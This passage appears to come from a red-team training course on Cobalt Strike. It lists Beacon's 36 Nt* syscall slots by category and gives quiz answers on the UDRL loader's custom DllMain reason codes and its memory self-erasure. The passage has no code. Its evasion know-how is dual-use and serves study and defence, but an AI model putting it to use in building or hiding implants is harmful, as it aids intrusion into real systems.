35 | ntDeviceIoControlFile | File I/O
36 | ntWaitForMultipleObjects | Synchronization

Category Breakdown

Category | Count | Examples
Memory | 10 | ntAllocateVirtualMemory, ntProtectVirtualMemory, ntFreeVirtualMemory, ntCreateSection, ntMapViewOfSection, ntOpenSection
Thread | 9 | ntGetContextThread, ntSetContextThread, ntResumeThread, ntCreateThreadEx, ntQueueApcThread, ntTestAlert
Process | 6 | ntOpenProcess, ntCreateProcess, ntSuspendProcess, ntResumeProcess, ntSetInformationProcess, ntQueryInformationProcess
File I/O | 5 | ntReadFile, ntWriteFile, ntCreateFile, ntQueryDirectoryFile, ntDeviceIoControlFile
Token | 2 | ntOpenProcessToken, ntAdjustPrivilegesToken
Object | 2 | ntClose, ntDuplicateObject
System | 1 | ntQuerySystemInformation
Synchronization | 1 | ntWaitForMultipleObjects

Module 5 Quiz: The UDRL Loader Walkthrough

Q1: What value is DLL_BEACON_USER_DATA?

Answer: DLL_BEACON_USER_DATA is 0x0d. This is a custom reason code (not a standard Windows constant) that tells Beacon's DllMain to interpret the lpReserved parameter as a USER_DATA pointer. The standard DLL_PROCESS_ATTACH is 0x01, and DLL_BEACON_START is 0x04, which is also a custom value (the standard DLL_THREAD_ATTACH is 2).

Q2: Why does the loader pass go as the hinstDLL parameter in the DLL_BEACON_START call?

Answer: The go function pointer gives Beacon the address of the loader's code in memory. After Beacon finishes initialization, it calls VirtualFree on this address to erase the UDRL loader from memory entirely. This is a cleanup measure: once the Beacon DLL is loaded and running, the loader code is no longer needed and its presence in memory would be an unnecessary detection surface.

Q3: How many Nt* functions does the SYSCALL_API structure support?

Answer: The SYSCALL_API structure in beacon.h defines exactly 36 SYSCALL_API_ENTRY slots for Cobalt Strike 4.11. These cover all system-level operations Beacon needs: memory management (10), thread operations (9), process operations (6), file I/O (5), token operations (2), object management (2), system queries (1), and synchronization (1).